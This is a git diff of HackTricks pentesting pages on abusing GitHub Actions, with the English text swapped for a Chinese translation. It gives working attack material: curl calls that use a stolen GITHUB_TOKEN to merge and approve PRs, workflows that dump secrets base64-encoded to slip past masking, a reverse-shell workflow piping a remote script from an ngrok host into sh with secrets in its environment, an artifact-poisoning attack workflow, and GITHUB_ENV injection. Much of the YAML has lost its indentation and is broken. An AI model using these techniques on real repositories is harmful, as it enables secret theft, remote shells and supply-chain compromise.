+## 持久性 -## Persistence +- 生成**用户令牌** +- 从**秘密**中窃取**github令牌** +- **删除**工作流**结果**和**分支** +- 给**所有组织**更多权限 +- 创建**webhooks**以提取信息 +- 邀请**外部协作者** +- **移除****SIEM**使用的**webhooks** +- 创建/修改带有**后门**的**Github Action** +- 通过**秘密**值修改查找**易受攻击的Github Action以进行命令注入** -- Generate **user token** -- Steal **github tokens** from **secrets** - - **Deletion** of workflow **results** and **branches** -- Give **more permissions to all the org** -- Create **webhooks** to exfiltrate information -- Invite **outside collaborators** -- **Remove** **webhooks** used by the **SIEM** -- Create/modify **Github Action** with a **backdoor** -- Find **vulnerable Github Action to command injection** via **secret** value modification +### 冒名顶替提交 - 通过repo提交的后门 -### Imposter Commits - Backdoor via repo commits - -In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**. - -Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): +在Github中,可以**从一个分叉创建一个PR到一个repo**。即使PR**未被接受**,在原始repo中也会为代码的分叉版本创建一个**提交**id。因此,攻击者**可以固定使用一个来自看似合法的repo的特定提交,该提交并不是由repo的所有者创建的**。 +像[**这个**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): ```yaml name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' +commit: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +- shell: bash +run: | +echo 'hello world!' ``` - -For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) +有关更多信息,请查看 [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index c5ce0467b..9d030fe12 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md @@ -4,389 +4,371 @@ ## Basic Information -In this page you will find: +在此页面中,您将找到: -- A **summary of all the impacts** of an attacker managing to access a Github Action -- Different ways to **get access to an action**: - - Having **permissions** to create the action - - Abusing **pull request** related triggers - - Abusing **other external access** techniques - - **Pivoting** from an already compromised repo -- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts) +- 攻击者成功访问 Github Action 的所有影响的 **摘要** +- 不同的 **获取访问权限** 的方式: +- 拥有 **创建 action** 的 **权限** +- 滥用与 **pull request** 相关的触发器 +- 滥用 **其他外部访问** 技术 +- 从已被攻陷的仓库进行 **横向移动** +- 最后,关于 **从内部滥用 action 的后期利用技术** 的一节(导致上述影响) ## Impacts Summary -For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions). 
+有关 [**Github Actions 的基本信息**](../basic-github-information.md#github-actions) 的介绍。 -If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to: +如果您可以在 **仓库** 中 **执行任意代码**,您可能能够: -- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP. -- **Compromise deployments** and other **artifacts**. - - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack. -- **Execute code in custom workers** to abuse computing power and pivot to other systems. -- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`. +- **窃取秘密**,并 **滥用管道的权限** 以获得对外部平台(如 AWS 和 GCP)的未授权访问。 +- **破坏部署** 和其他 **工件**。 +- 如果管道部署或存储资产,您可以更改最终产品,从而启用供应链攻击。 +- **在自定义工作节点中执行代码**,以滥用计算能力并横向移动到其他系统。 +- **覆盖仓库代码**,具体取决于与 `GITHUB_TOKEN` 相关的权限。 ## GITHUB_TOKEN -This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option: +这个 "**秘密**"(来自 `${{ secrets.GITHUB_TOKEN }}` 和 `${{ github.token }}`)是在管理员启用此选项时提供的:
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) +此令牌与 **Github 应用程序使用的令牌相同**,因此可以访问相同的端点:[https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps) > [!WARNING] -> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`. +> Github 应该发布一个 [**流程**](https://github.com/github/roadmap/issues/74),**允许跨仓库** 访问 GitHub,以便一个仓库可以使用 `GITHUB_TOKEN` 访问其他内部仓库。 -You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) +您可以在以下链接查看此令牌的可能 **权限**:[https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token) -Note that the token **expires after the job has completed**.\ -These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` +请注意,令牌 **在作业完成后会过期**。\ +这些令牌的格式如下:`ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7` -Some interesting things you can do with this token: +您可以使用此令牌执行的一些有趣操作: {{#tabs }} {{#tab name="Merge PR" }} - ```bash # Merge PR curl -X PUT \ - https://api.github.com/repos///pulls//merge \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header "content-type: application/json" \ - -d "{\"commit_title\":\"commit_title\"}" +https://api.github.com/repos///pulls//merge \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header "content-type: application/json" \ +-d "{\"commit_title\":\"commit_title\"}" ``` - {{#endtab }} -{{#tab name="Approve PR" }} - +{{#tab name="批准 PR" }} ```bash # Approve a PR curl -X POST \ - https://api.github.com/repos///pulls//reviews \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - -d '{"event":"APPROVE"}' +https://api.github.com/repos///pulls//reviews \ +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +-d '{"event":"APPROVE"}' ``` - {{#endtab }} -{{#tab name="Create PR" }} - +{{#tab name="创建 PR" }} ```bash # Create a PR curl -X POST \ - -H "Accept: application/vnd.github.v3+json" \ - --header "authorization: Bearer $GITHUB_TOKEN" \ - --header 'content-type: application/json' \ - https://api.github.com/repos///pulls \ - -d '{"head":"","base":"master", "title":"title"}' +-H "Accept: application/vnd.github.v3+json" \ +--header "authorization: Bearer $GITHUB_TOKEN" \ +--header 'content-type: application/json' \ +https://api.github.com/repos///pulls \ +-d '{"head":"","base":"master", "title":"title"}' ``` - {{#endtab }} {{#endtabs }} > [!CAUTION] -> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. 
These tokens may give you more privileges over the repository and organization. +> 请注意,在多个情况下,您将能够在 **Github Actions 环境或秘密中找到 github 用户令牌**。这些令牌可能会让您对存储库和组织拥有更多权限。
-List secrets in Github Action output - +列出 Github Action 输出中的秘密 ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-Get reverse shell with secrets - +通过秘密获取反向 shell ```yaml name: revshell on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - "**" - push: # Run it when a push is made to a branch - branches: - - "**" +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- "**" +push: # Run it when a push is made to a branch +branches: +- "**" jobs: - create_pull_request: - runs-on: ubuntu-latest - steps: - - name: Get Rev Shell - run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +create_pull_request: +runs-on: ubuntu-latest +steps: +- name: Get Rev Shell +run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions: +可以通过**检查日志**来查看其他用户仓库中Github Token的权限:
-## Allowed Execution +## 允许的执行 > [!NOTE] -> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**. +> 这是妥协Github actions的最简单方法,因为这种情况假设您有**在组织中创建新仓库的权限**,或对**某个仓库具有写权限**。 > -> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action). +> 如果您处于这种情况,您可以查看[后期利用技术](./#post-exploitation-techniques-from-inside-an-action)。 -### Execution from Repo Creation +### 从仓库创建执行 -In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**. +如果组织的成员可以**创建新仓库**并且您可以执行github actions,您可以**创建一个新仓库并窃取在组织级别设置的秘密**。 -### Execution from a New Branch +### 从新分支执行 -If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called). - -You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be): +如果您可以**在已经配置了Github Action的仓库中创建新分支**,您可以**修改**它,**上传**内容,然后**从新分支执行该操作**。这样您可以**提取仓库和组织级别的秘密**(但您需要知道它们的名称)。 +您可以在**手动**时使修改后的操作可执行,当**创建PR时**或当**推送某些代码时**(取决于您想要多吵): ```yaml on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - master - push: # Run it when a push is made to a branch - branches: - - current_branch_name +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- master +push: # Run it when a push is made to a branch +branches: +- current_branch_name # Use '**' instead of a branh name to trigger the action in all the cranches ``` - --- ## Forked Execution > [!NOTE] -> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them. +> 有不同的触发器可以让攻击者**执行另一个仓库的Github Action**。如果这些可触发的操作配置不当,攻击者可能会利用它们。 ### `pull_request` -The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow: +工作流触发器**`pull_request`**将在每次收到拉取请求时执行工作流,但有一些例外:默认情况下,如果这是您**第一次**进行**协作**,某些**维护者**需要**批准**工作流的**运行**:
> [!NOTE] -> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**. +> 由于**默认限制**适用于**首次**贡献者,您可以通过**修复有效的错误/拼写错误**来贡献,然后发送**其他PR以滥用您新的`pull_request`权限**。 > -> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~ +> **我测试过,这不管用**:~~另一个选项是创建一个与曾经为该项目贡献的人同名的账户,然后删除他的账户。~~ -Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories): +此外,默认情况下**防止写权限**和**对目标仓库的秘密访问**,如[**文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories)中所述: -> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**. +> 除了`GITHUB_TOKEN`,**在从**`forked`**仓库触发工作流时,秘密不会传递给运行器**。在来自**forked repositories**的拉取请求中,**`GITHUB_TOKEN`具有只读权限**。 -An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations. +攻击者可以修改Github Action的定义,以执行任意操作并附加任意操作。然而,由于上述限制,他将无法窃取秘密或覆盖仓库。 > [!CAUTION] -> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!** +> **是的,如果攻击者在PR中更改将被触发的github action,他的Github Action将被使用,而不是源仓库的那个!** -As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**. +由于攻击者还控制着被执行的代码,即使在`GITHUB_TOKEN`上没有秘密或写权限,攻击者也可以例如**上传恶意工件**。 ### **`pull_request_target`** -The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission). +工作流触发器**`pull_request_target`**对目标仓库具有**写权限**和**对秘密的访问**(并且不需要请求权限)。 -Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\ -Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/). +请注意,工作流触发器**`pull_request_target`**在基础上下文中运行,而不是在PR提供的上下文中(以**不执行不受信任的代码**)。有关`pull_request_target`的更多信息,请[**查看文档**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target)。\ +此外,关于这种特定危险用法的更多信息,请查看这篇[**github博客文章**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)。 -It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**. +看起来因为**执行的工作流**是定义在**基础**而**不是在PR**中的,所以使用**`pull_request_target`**是**安全的**,但有**一些情况并非如此**。 -An this one will have **access to secrets**. 
+而且这个将具有**对秘密的访问**。 ### `workflow_run` -The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`. - -In this example, a workflow is configured to run after the separate "Run Tests" workflow completes: +[**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run)触发器允许在工作流`完成`、`请求`或`进行中`时从不同的工作流运行一个工作流。 +在这个例子中,配置了一个工作流,在单独的“运行测试”工作流完成后运行: ```yaml on: - workflow_run: - workflows: [Run Tests] - types: - - completed +workflow_run: +workflows: [Run Tests] +types: +- completed ``` +此外,根据文档:由 `workflow_run` 事件启动的工作流能够 **访问秘密和写入令牌,即使之前的工作流没有**。 -Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**. - -This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\ -The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**. +这种工作流可能会受到攻击,如果它 **依赖** 于一个可以通过 **`pull_request`** 或 **`pull_request_target`** 被外部用户 **触发** 的 **工作流**。一些脆弱的示例可以在 [**这篇博客中找到**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** 第一个示例是 **`workflow_run`** 触发的工作流下载攻击者的代码:`${{ github.event.pull_request.head.sha }}`\ +第二个示例是 **将** 一个 **工件** 从 **不受信任** 的代码传递到 **`workflow_run`** 工作流,并以使其 **易受 RCE 攻击** 的方式使用该工件的内容。 ### `workflow_call` TODO -TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR +TODO:检查从 pull_request 执行时使用/下载的代码是否来自原始或分叉的 PR -## Abusing Forked Execution +## 滥用分叉执行 -We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused: +我们已经提到外部攻击者可以使 GitHub 工作流执行的所有方式,现在让我们看看这些执行如果配置不当,可能会被滥用的情况: -### Untrusted checkout execution +### 不受信任的检出执行 -In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request). +在 **`pull_request`** 的情况下,工作流将在 **PR 的上下文中** 执行(因此它将执行 **恶意 PR 的代码**),但需要有人 **先授权**,并且它将运行时有一些 [限制](./#pull_request)。 -In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**. +如果工作流使用 **`pull_request_target` 或 `workflow_run`**,并依赖于可以从 **`pull_request_target` 或 `pull_request`** 触发的工作流,则将执行原始仓库中的代码,因此 **攻击者无法控制执行的代码**。 > [!CAUTION] -> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. 
For example (check line 12 where the PR code is downloaded): +> 但是,如果 **action** 有一个 **显式的 PR 检出**,将 **从 PR 获取代码**(而不是从基础),它将使用攻击者控制的代码。例如(检查第 12 行,其中下载了 PR 代码): -
# INSECURE. Provided as an example only.
+
# 不安全。仅作为示例提供。
 on:
-  pull_request_target
+  pull_request_target
 
 jobs:
-  build:
-    name: Build and test
-    runs-on: ubuntu-latest
-    steps:
+  build:
+    name: Build and test
+    runs-on: ubuntu-latest
+    steps:
     - uses: actions/checkout@v2
       with:
         ref: ${{ github.event.pull_request.head.sha }}
 
-    - uses: actions/setup-node@v1
-    - run: |
-        npm install
-        npm build
+    - uses: actions/setup-node@v1
+    - run: |
+        npm install
+        npm build
 
-    - uses: completely/fakeaction@v2
-      with:
-        arg1: ${{ secrets.supersecret }}
+    - uses: completely/fakeaction@v2
+      with:
+        arg1: ${{ secrets.supersecret }}
 
-    - uses: fakerepo/comment-on-pr@v1
-      with:
-        message: |
-          Thank you!
+    - uses: fakerepo/comment-on-pr@v1
+      with:
+        message: |
+          谢谢!
 
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**. +潜在的 **不受信任的代码在 `npm install` 或 `npm build` 期间被运行**,因为构建脚本和引用的 **包由 PR 的作者控制**。 > [!WARNING] -> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR). +> 搜索脆弱 actions 的 GitHub dork 是:`event.pull_request pull_request_target extension:yml`,但是,即使 action 配置不安全,也有不同的方法可以安全地配置要执行的作业(例如,使用关于谁是生成 PR 的参与者的条件)。 -### Context Script Injections +### 上下文脚本注入 -Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:** +请注意,有某些 [**GitHub 上下文**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) 的值是由创建 PR 的 **用户** **控制** 的。如果 GitHub action 使用该 **数据执行任何操作**,可能会导致 **任意代码执行:** {{#ref}} gh-actions-context-script-injections.md {{#endref}} -### **GITHUB_ENV Script Injection** +### **GITHUB_ENV 脚本注入** -From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file. +根据文档:您可以通过定义或更新环境变量并将其写入 **`GITHUB_ENV`** 环境文件,使 **环境变量可用于工作流作业中的任何后续步骤**。 -If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**. +如果攻击者能够 **在此 env 变量中注入任何值**,他可以注入可以在后续步骤中执行代码的 env 变量,例如 **LD_PRELOAD** 或 **NODE_OPTIONS**。 -For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it: +例如([**这个**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) 和 [**这个**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)),想象一个工作流,它信任上传的工件将其内容存储在 **`GITHUB_ENV`** env 变量中。攻击者可以上传类似这样的内容来破坏它:
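A hedged sketch of what such a poisoned artifact could look like; the file name and the victim step are assumptions about the vulnerable pattern (a privileged workflow step that appends the downloaded artifact to `$GITHUB_ENV`):

```bash
# Attacker side: the file that gets uploaded as the artifact (the name is a placeholder)
cat > env_vars.txt <<'EOF'
NODE_OPTIONS=--require /tmp/payload.js
LD_PRELOAD=/tmp/payload.so
EOF

# Victim side (assumed vulnerable step in the privileged workflow):
#   - run: cat env_vars.txt >> "$GITHUB_ENV"
# Every later step that runs node or a dynamically linked binary now loads the attacker's payload.
```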
-### Vulnerable Third Party Github Actions +### 脆弱的第三方 GitHub Actions #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact) -As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories. +正如在 [**这篇博客文章**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks) 中提到的,这个 GitHub Action 允许访问来自不同工作流甚至仓库的工件。 -The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact. - -Example of vulnerable workflow: +问题在于,如果 **`path`** 参数未设置,工件将提取到当前目录,并且可能会覆盖后续在工作流中使用或执行的文件。因此,如果工件是脆弱的,攻击者可以利用这一点来破坏其他信任该工件的工作流。 +脆弱工作流的示例: ```yaml on: - workflow_run: - workflows: ["some workflow"] - types: - - completed +workflow_run: +workflows: ["some workflow"] +types: +- completed jobs: - success: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v2 - - name: download artifact - uses: dawidd6/action-download-artifact - with: - workflow: ${{ github.event.workflow_run.workflow_id }} - name: artifact - - run: python ./script.py - with: - name: artifact - path: ./script.py +success: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@v2 +- name: download artifact +uses: dawidd6/action-download-artifact +with: +workflow: ${{ github.event.workflow_run.workflow_id }} +name: artifact +- run: python ./script.py +with: +name: artifact +path: ./script.py ``` - -This could be attacked with this workflow: - +这可以通过以下工作流进行攻击: ```yaml name: "some workflow" on: pull_request jobs: - upload: - runs-on: ubuntu-latest - steps: - - run: echo "print('exploited')" > ./script.py - - uses actions/upload-artifact@v2 - with: - name: artifact - path: ./script.py +upload: +runs-on: ubuntu-latest +steps: +- run: echo "print('exploited')" > ./script.py +- uses actions/upload-artifact@v2 +with: +name: artifact +path: ./script.py ``` - --- -## Other External Access +## 其他外部访问 -### Deleted Namespace Repo Hijacking +### 删除的命名空间仓库劫持 -If an account changes it's name another user could register an account with that name after some time. If a repository had **less than 100 stars previously to the change of nam**e, Github will allow the new register user with the same name to create a **repository with the same name** as the one deleted. +如果一个账户更改了名称,其他用户在一段时间后可以注册一个相同名称的账户。如果一个仓库在更改名称之前的**星标少于100个**,Github将允许新注册的用户使用相同的名称创建一个**与被删除的仓库同名的仓库**。 > [!CAUTION] -> So if an action is using a repo from a non-existent account, it's still possible that an attacker could create that account and compromise the action. 
+> 因此,如果一个操作使用来自不存在账户的仓库,攻击者仍然有可能创建该账户并妥协该操作。 -If other repositories where using **dependencies from this user repos**, an attacker will be able to hijack them Here you have a more complete explanation: [https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) +如果其他仓库使用了**该用户仓库的依赖项**,攻击者将能够劫持它们。这里有一个更完整的解释:[https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/](https://blog.nietaanraken.nl/posts/gitub-popular-repository-namespace-retirement-bypass/) --- -## Repo Pivoting +## 仓库转移 > [!NOTE] -> In this section we will talk about techniques that would allow to **pivot from one repo to another** supposing we have some kind of access on the first one (check the previous section). +> 在本节中,我们将讨论允许**从一个仓库转移到另一个仓库**的技术,假设我们在第一个仓库上有某种访问权限(请查看前一节)。 -### Cache Poisoning +### 缓存中毒 -A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow. +在**同一分支的工作流运行之间**维护一个缓存。这意味着如果攻击者**妥协**了一个**包**,然后将其存储在缓存中,并被**更高权限的**工作流**下载**和执行,他将能够**妥协**该工作流。 {{#ref}} gh-actions-cache-poisoning.md {{#endref}} -### Artifact Poisoning +### 工件中毒 -Workflows could use **artifacts from other workflows and even repos**, if an attacker manages to **compromise** the Github Action that **uploads an artifact** that is later used by another workflow he could **compromise the other workflows**: +工作流可以使用**来自其他工作流甚至仓库的工件**,如果攻击者设法**妥协**了上传工件的Github Action,而该工件随后被另一个工作流使用,他可以**妥协其他工作流**: {{#ref}} gh-actions-artifact-poisoning.md @@ -394,11 +376,11 @@ gh-actions-artifact-poisoning.md --- -## Post Exploitation from an Action +## 从操作后的利用 -### Accessing AWS and GCP via OIDC +### 通过OIDC访问AWS和GCP -Check the following pages: +查看以下页面: {{#ref}} ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -408,170 +390,160 @@ Check the following pages: ../../../pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md {{#endref}} -### Accessing secrets +### 访问秘密 -If you are injecting content into a script it's interesting to know how you can access secrets: +如果您正在向脚本中注入内容,了解如何访问秘密是很有趣的: -- If the secret or token is set to an **environment variable**, it can be directly accessed through the environment using **`printenv`**. +- 如果秘密或令牌被设置为**环境变量**,可以通过环境直接使用**`printenv`**访问。
-List secrets in Github Action output - +在Github Action输出中列出秘密 ```yaml name: list_env on: - workflow_dispatch: # Launch manually - pull_request: #Run it when a PR is created to a branch - branches: - - '**' - push: # Run it when a push is made to a branch - branches: - - '**' +workflow_dispatch: # Launch manually +pull_request: #Run it when a PR is created to a branch +branches: +- '**' +push: # Run it when a push is made to a branch +branches: +- '**' jobs: - List_env: - runs-on: ubuntu-latest - steps: - - name: List Env - # Need to base64 encode or github will change the secret value for "***" - run: sh -c 'env | grep "secret_" | base64 -w0' - env: - secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} +List_env: +runs-on: ubuntu-latest +steps: +- name: List Env +# Need to base64 encode or github will change the secret value for "***" +run: sh -c 'env | grep "secret_" | base64 -w0' +env: +secret_myql_pass: ${{secrets.MYSQL_PASSWORD}} - secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} +secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}} ``` -
